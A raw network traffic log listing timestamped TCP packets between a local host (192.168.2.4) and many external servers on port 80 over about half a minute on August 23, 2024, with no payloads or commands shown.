Aug 23, 2024 18:48:35.714307070 CEST	51124	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:35.714339018 CEST	64300	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:35.714438915 CEST	64300	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:35.721811056 CEST	80	64299	15.197.240.20	192.168.2.4
Aug 23, 2024 18:48:35.722348928 CEST	80	64300	64.225.91.73	192.168.2.4
Aug 23, 2024 18:48:36.010540009 CEST	64301	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:48:36.016143084 CEST	80	64301	103.224.182.252	192.168.2.4
Aug 23, 2024 18:48:36.016222000 CEST	64301	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:48:36.018482924 CEST	64301	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:48:36.019304037 CEST	64302	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:48:36.025811911 CEST	80	64301	103.224.182.252	192.168.2.4
Aug 23, 2024 18:48:36.026873112 CEST	80	64302	103.224.212.210	192.168.2.4
Aug 23, 2024 18:48:36.026935101 CEST	64302	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:48:36.029324055 CEST	64302	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:48:36.035015106 CEST	80	64302	103.224.212.210	192.168.2.4
Aug 23, 2024 18:48:36.043469906 CEST	51130	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:36.043752909 CEST	64303	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:36.048824072 CEST	80	64303	154.85.183.50	192.168.2.4
Aug 23, 2024 18:48:36.048892021 CEST	64303	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:36.049006939 CEST	64303	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:36.049325943 CEST	80	51130	154.85.183.50	192.168.2.4
Aug 23, 2024 18:48:36.049390078 CEST	51130	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:36.054934978 CEST	80	64303	154.85.183.50	192.168.2.4
Aug 23, 2024 18:48:36.203397989 CEST	80	64298	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:36.203452110 CEST	64298	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:36.203458071 CEST	80	64298	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:36.203491926 CEST	64298	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:36.204777002 CEST	64298	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:36.209784985 CEST	80	64298	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:36.316200018 CEST	80	64300	64.225.91.73	192.168.2.4
Aug 23, 2024 18:48:36.316287041 CEST	64300	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:36.638926983 CEST	80	64301	103.224.182.252	192.168.2.4
Aug 23, 2024 18:48:36.639003992 CEST	64301	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:48:36.644536018 CEST	80	64301	103.224.182.252	192.168.2.4
Aug 23, 2024 18:48:36.644583941 CEST	64301	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:48:36.648309946 CEST	80	64302	103.224.212.210	192.168.2.4
Aug 23, 2024 18:48:36.648361921 CEST	64302	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:48:36.653275013 CEST	80	64302	103.224.212.210	192.168.2.4
Aug 23, 2024 18:48:36.653341055 CEST	64302	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:48:36.669356108 CEST	64301	80	192.168.2.4	103.224.182.252
Aug 23, 2024 18:48:36.669980049 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:36.670681000 CEST	64302	80	192.168.2.4	103.224.212.210
Aug 23, 2024 18:48:36.671386957 CEST	64305	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:48:36.683744907 CEST	80	64301	103.224.182.252	192.168.2.4
Aug 23, 2024 18:48:36.685182095 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:36.685245037 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:36.688349962 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:36.689145088 CEST	80	64302	103.224.212.210	192.168.2.4
Aug 23, 2024 18:48:36.689158916 CEST	80	64305	199.59.243.226	192.168.2.4
Aug 23, 2024 18:48:36.689210892 CEST	64305	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:48:36.690232992 CEST	64305	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:48:36.703293085 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:36.705780983 CEST	80	64305	199.59.243.226	192.168.2.4
Aug 23, 2024 18:48:36.973824024 CEST	80	64303	154.85.183.50	192.168.2.4
Aug 23, 2024 18:48:36.973905087 CEST	64303	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:36.975828886 CEST	64303	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:36.999135971 CEST	80	64303	154.85.183.50	192.168.2.4
Aug 23, 2024 18:48:37.250704050 CEST	80	64305	199.59.243.226	192.168.2.4
Aug 23, 2024 18:48:37.251041889 CEST	64305	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:48:37.254831076 CEST	80	64305	199.59.243.226	192.168.2.4
Aug 23, 2024 18:48:37.254844904 CEST	80	64305	199.59.243.226	192.168.2.4
Aug 23, 2024 18:48:37.254895926 CEST	64305	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:48:37.254965067 CEST	64305	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:48:37.254992008 CEST	64305	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:48:37.270175934 CEST	80	64305	199.59.243.226	192.168.2.4
Aug 23, 2024 18:48:37.271307945 CEST	64305	80	192.168.2.4	199.59.243.226
Aug 23, 2024 18:48:37.314152002 CEST	80	64303	154.85.183.50	192.168.2.4
Aug 23, 2024 18:48:37.314742088 CEST	64303	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:37.467792034 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.467902899 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.468650103 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.468663931 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.468714952 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.471925020 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.471935987 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.471980095 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.475547075 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.475565910 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.475611925 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.478667021 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.478678942 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.478739977 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.481442928 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.481455088 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.481465101 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.481504917 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.481533051 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.559076071 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.559278965 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.559663057 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.559674025 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.559712887 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.559753895 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.561822891 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.561840057 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.561883926 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.564941883 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.564954042 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.564985037 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.564996004 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.568396091 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.568408012 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.568445921 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.571731091 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:37.571985006 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.572063923 CEST	64304	80	192.168.2.4	64.190.63.136
Aug 23, 2024 18:48:37.578212023 CEST	80	64304	64.190.63.136	192.168.2.4
Aug 23, 2024 18:48:39.716171026 CEST	64299	80	192.168.2.4	15.197.240.20
Aug 23, 2024 18:48:39.717628956 CEST	64306	80	192.168.2.4	15.197.240.20
Aug 23, 2024 18:48:39.751641989 CEST	80	64306	15.197.240.20	192.168.2.4
Aug 23, 2024 18:48:39.751753092 CEST	64306	80	192.168.2.4	15.197.240.20
Aug 23, 2024 18:48:39.751919031 CEST	64306	80	192.168.2.4	15.197.240.20
Aug 23, 2024 18:48:39.763380051 CEST	80	64306	15.197.240.20	192.168.2.4
Aug 23, 2024 18:48:47.412611008 CEST	80	50749	64.225.91.73	192.168.2.4
Aug 23, 2024 18:48:47.412756920 CEST	50749	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:49.461451054 CEST	50749	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:49.461517096 CEST	64303	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:49.461535931 CEST	64300	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:49.461566925 CEST	64292	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:49.461630106 CEST	64290	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:49.461893082 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:48:49.461966991 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:48:49.461998940 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:48:49.462086916 CEST	64273	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:48:49.462102890 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:48:49.462140083 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:48:49.470139027 CEST	80	50749	64.225.91.73	192.168.2.4
Aug 23, 2024 18:48:49.470268011 CEST	80	64292	103.150.11.230	192.168.2.4
Aug 23, 2024 18:48:49.473346949 CEST	80	64273	162.255.119.102	192.168.2.4
Aug 23, 2024 18:48:49.480057955 CEST	80	64303	154.85.183.50	192.168.2.4
Aug 23, 2024 18:48:49.480114937 CEST	64303	80	192.168.2.4	154.85.183.50
Aug 23, 2024 18:48:49.480122089 CEST	80	64300	64.225.91.73	192.168.2.4
Aug 23, 2024 18:48:49.480137110 CEST	80	64290	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:49.480171919 CEST	64300	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:49.480200052 CEST	64290	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:49.482291937 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:48:49.482306957 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:48:49.482326031 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:48:49.482340097 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:48:49.482350111 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:48:49.482373953 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:48:49.482388020 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:48:49.482420921 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:48:49.493860006 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:48:49.493943930 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:48:50.292898893 CEST	80	64306	15.197.240.20	192.168.2.4
Aug 23, 2024 18:48:50.293064117 CEST	64306	80	192.168.2.4	15.197.240.20
Aug 23, 2024 18:48:50.293176889 CEST	64306	80	192.168.2.4	15.197.240.20
Aug 23, 2024 18:48:50.304306984 CEST	80	64306	15.197.240.20	192.168.2.4
Aug 23, 2024 18:48:51.233253002 CEST	50116	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:51.245985031 CEST	80	50116	64.225.91.73	192.168.2.4
Aug 23, 2024 18:48:51.246123075 CEST	50116	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:51.246264935 CEST	50116	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:51.259587049 CEST	80	50116	64.225.91.73	192.168.2.4
Aug 23, 2024 18:48:51.328077078 CEST	50117	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:51.334610939 CEST	80	50117	72.52.179.174	192.168.2.4
Aug 23, 2024 18:48:51.334687948 CEST	50117	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:51.334958076 CEST	50117	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:51.341953039 CEST	80	50117	72.52.179.174	192.168.2.4
Aug 23, 2024 18:48:51.934623003 CEST	80	50117	72.52.179.174	192.168.2.4
Aug 23, 2024 18:48:51.934695959 CEST	50117	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:51.934988976 CEST	50117	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:51.935988903 CEST	80	50116	64.225.91.73	192.168.2.4
Aug 23, 2024 18:48:51.936053038 CEST	50116	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:51.939632893 CEST	50118	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:51.947417974 CEST	80	50117	72.52.179.174	192.168.2.4
Aug 23, 2024 18:48:51.962115049 CEST	80	50118	72.52.179.174	192.168.2.4
Aug 23, 2024 18:48:51.962654114 CEST	50118	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:51.962806940 CEST	50118	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:51.983840942 CEST	80	50118	72.52.179.174	192.168.2.4
Aug 23, 2024 18:48:52.578664064 CEST	80	50118	72.52.179.174	192.168.2.4
Aug 23, 2024 18:48:52.579520941 CEST	50118	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:52.579612970 CEST	50118	80	192.168.2.4	72.52.179.174
Aug 23, 2024 18:48:52.587263107 CEST	80	50118	72.52.179.174	192.168.2.4
Aug 23, 2024 18:48:54.210341930 CEST	50027	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:48:54.223242044 CEST	80	50027	52.34.198.229	192.168.2.4
Aug 23, 2024 18:48:54.223345041 CEST	50027	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:48:54.223489046 CEST	50027	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:48:54.236244917 CEST	80	50027	52.34.198.229	192.168.2.4
Aug 23, 2024 18:48:55.043040991 CEST	80	50027	52.34.198.229	192.168.2.4
Aug 23, 2024 18:48:55.045463085 CEST	50027	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:48:55.048800945 CEST	80	50027	52.34.198.229	192.168.2.4
Aug 23, 2024 18:48:55.049436092 CEST	50027	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:48:55.099538088 CEST	50027	80	192.168.2.4	52.34.198.229
Aug 23, 2024 18:48:55.115207911 CEST	80	50027	52.34.198.229	192.168.2.4
Aug 23, 2024 18:48:56.438395023 CEST	49517	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:56.443459988 CEST	80	49517	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:56.443649054 CEST	49517	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:56.443649054 CEST	49517	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:56.448868990 CEST	80	49517	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:56.952442884 CEST	80	49517	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:56.952581882 CEST	49517	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:56.953619957 CEST	49517	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:56.954581022 CEST	80	49517	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:56.954972982 CEST	49517	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:56.962611914 CEST	80	49517	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:58.456842899 CEST	56383	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:48:58.457371950 CEST	56384	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:48:58.479082108 CEST	80	56383	162.255.119.102	192.168.2.4
Aug 23, 2024 18:48:58.479175091 CEST	56383	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:48:58.479394913 CEST	56383	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:48:58.484519958 CEST	80	56384	3.64.163.50	192.168.2.4
Aug 23, 2024 18:48:58.484582901 CEST	56384	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:48:58.485250950 CEST	56384	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:48:58.504426956 CEST	80	56383	162.255.119.102	192.168.2.4
Aug 23, 2024 18:48:58.510412931 CEST	80	56384	3.64.163.50	192.168.2.4
Aug 23, 2024 18:48:58.537492990 CEST	56385	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:48:58.558861017 CEST	80	56385	188.114.96.3	192.168.2.4
Aug 23, 2024 18:48:58.558926105 CEST	56385	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:48:58.559020996 CEST	56385	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:48:58.580583096 CEST	80	56385	188.114.96.3	192.168.2.4
Aug 23, 2024 18:48:58.632142067 CEST	56386	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:58.642245054 CEST	56387	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:58.654860020 CEST	80	56386	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:58.654928923 CEST	56386	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:58.655076981 CEST	56386	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:58.665780067 CEST	80	56387	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:58.665853024 CEST	56387	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:58.665987015 CEST	56387	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:58.677679062 CEST	80	56386	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:58.689873934 CEST	80	56387	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:58.692333937 CEST	56388	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:48:58.715426922 CEST	80	56388	208.100.26.245	192.168.2.4
Aug 23, 2024 18:48:58.715497017 CEST	56388	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:48:58.715660095 CEST	56388	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:48:58.737487078 CEST	80	56388	208.100.26.245	192.168.2.4
Aug 23, 2024 18:48:58.757750034 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:48:58.771104097 CEST	56390	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:58.784487963 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:48:58.786489010 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:48:58.787022114 CEST	56389	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:48:58.794823885 CEST	80	56390	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:58.794902086 CEST	56390	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:58.795012951 CEST	56390	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:58.802936077 CEST	56391	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:58.805474997 CEST	80	56389	199.191.50.83	192.168.2.4
Aug 23, 2024 18:48:58.809595108 CEST	80	56390	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:58.818198919 CEST	80	56391	172.234.222.143	192.168.2.4
Aug 23, 2024 18:48:58.818286896 CEST	56391	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:58.818416119 CEST	56391	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:58.829689980 CEST	80	56391	172.234.222.143	192.168.2.4
Aug 23, 2024 18:48:58.884098053 CEST	56392	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:48:58.899760008 CEST	80	56392	3.94.10.34	192.168.2.4
Aug 23, 2024 18:48:58.899833918 CEST	56392	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:48:58.899947882 CEST	56392	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:48:58.916002035 CEST	80	56392	3.94.10.34	192.168.2.4
Aug 23, 2024 18:48:59.114545107 CEST	56393	80	192.168.2.4	69.162.80.58
Aug 23, 2024 18:48:59.133501053 CEST	80	56393	69.162.80.58	192.168.2.4
Aug 23, 2024 18:48:59.133569956 CEST	56393	80	192.168.2.4	69.162.80.58
Aug 23, 2024 18:48:59.133737087 CEST	56393	80	192.168.2.4	69.162.80.58
Aug 23, 2024 18:48:59.149997950 CEST	80	56393	69.162.80.58	192.168.2.4
Aug 23, 2024 18:48:59.222850084 CEST	80	56384	3.64.163.50	192.168.2.4
Aug 23, 2024 18:48:59.222908974 CEST	56384	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:48:59.224190950 CEST	56384	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:48:59.226248026 CEST	80	56387	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:59.226259947 CEST	80	56387	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:59.226341009 CEST	56387	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:59.227231026 CEST	56387	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:59.232975006 CEST	80	56386	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:59.233026981 CEST	56386	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:59.233707905 CEST	56386	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:59.235328913 CEST	80	56384	3.64.163.50	192.168.2.4
Aug 23, 2024 18:48:59.235341072 CEST	80	56386	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:59.235389948 CEST	56386	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:59.235722065 CEST	80	56387	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:59.242503881 CEST	80	56386	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:59.281402111 CEST	80	56388	208.100.26.245	192.168.2.4
Aug 23, 2024 18:48:59.281481981 CEST	56388	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:48:59.282566071 CEST	56388	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:48:59.299763918 CEST	80	56388	208.100.26.245	192.168.2.4
Aug 23, 2024 18:48:59.323843956 CEST	80	56383	162.255.119.102	192.168.2.4
Aug 23, 2024 18:48:59.323898077 CEST	56383	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:48:59.339868069 CEST	80	56390	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:59.339922905 CEST	56390	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:59.340502977 CEST	56394	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:48:59.341003895 CEST	56390	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:59.343770981 CEST	80	56390	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:59.343816996 CEST	56390	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:59.354975939 CEST	80	56394	85.17.31.122	192.168.2.4
Aug 23, 2024 18:48:59.355140924 CEST	56394	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:48:59.355257988 CEST	56394	80	192.168.2.4	85.17.31.122
Aug 23, 2024 18:48:59.356765032 CEST	80	56390	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:59.360418081 CEST	80	56391	172.234.222.143	192.168.2.4
Aug 23, 2024 18:48:59.360466003 CEST	56391	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:59.360549927 CEST	56391	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:59.361386061 CEST	56395	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:59.365504026 CEST	80	56394	85.17.31.122	192.168.2.4
Aug 23, 2024 18:48:59.369467020 CEST	80	56391	172.234.222.143	192.168.2.4
Aug 23, 2024 18:48:59.370623112 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:48:59.373733997 CEST	80	56395	172.234.222.143	192.168.2.4
Aug 23, 2024 18:48:59.373795986 CEST	56395	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:59.373905897 CEST	56395	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:59.382030964 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:48:59.382095098 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:48:59.382220030 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:48:59.386611938 CEST	80	56395	172.234.222.143	192.168.2.4
Aug 23, 2024 18:48:59.394071102 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:48:59.413589001 CEST	80	56388	208.100.26.245	192.168.2.4
Aug 23, 2024 18:48:59.413638115 CEST	56388	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:48:59.424563885 CEST	80	56384	3.64.163.50	192.168.2.4
Aug 23, 2024 18:48:59.424614906 CEST	56384	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:48:59.438848972 CEST	80	56392	3.94.10.34	192.168.2.4
Aug 23, 2024 18:48:59.438926935 CEST	56392	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:48:59.439702034 CEST	56392	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:48:59.440896988 CEST	80	56392	3.94.10.34	192.168.2.4
Aug 23, 2024 18:48:59.440946102 CEST	56392	80	192.168.2.4	3.94.10.34
Aug 23, 2024 18:48:59.466737032 CEST	80	56392	3.94.10.34	192.168.2.4
Aug 23, 2024 18:48:59.720093966 CEST	80	56393	69.162.80.58	192.168.2.4
Aug 23, 2024 18:48:59.720187902 CEST	56393	80	192.168.2.4	69.162.80.58
Aug 23, 2024 18:48:59.720263004 CEST	56393	80	192.168.2.4	69.162.80.58
Aug 23, 2024 18:48:59.721370935 CEST	80	56393	69.162.80.58	192.168.2.4
Aug 23, 2024 18:48:59.721427917 CEST	56393	80	192.168.2.4	69.162.80.58
Aug 23, 2024 18:48:59.725783110 CEST	80	56393	69.162.80.58	192.168.2.4
Aug 23, 2024 18:48:59.921673059 CEST	80	56395	172.234.222.143	192.168.2.4
Aug 23, 2024 18:48:59.921822071 CEST	56395	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:59.921822071 CEST	56395	80	192.168.2.4	172.234.222.143
Aug 23, 2024 18:48:59.927074909 CEST	80	56395	172.234.222.143	192.168.2.4
Aug 23, 2024 18:49:00.092837095 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.092910051 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.094475031 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.094486952 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.094537020 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.102341890 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.102353096 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.102399111 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.110156059 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.110168934 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.110291004 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.117014885 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.117027044 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.117038012 CEST	80	56396	91.195.240.19	192.168.2.4
Aug 23, 2024 18:49:00.117069960 CEST	56396	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:49:00.117099047 CEST	56396	80	192.168.2.4	91.195.240.19
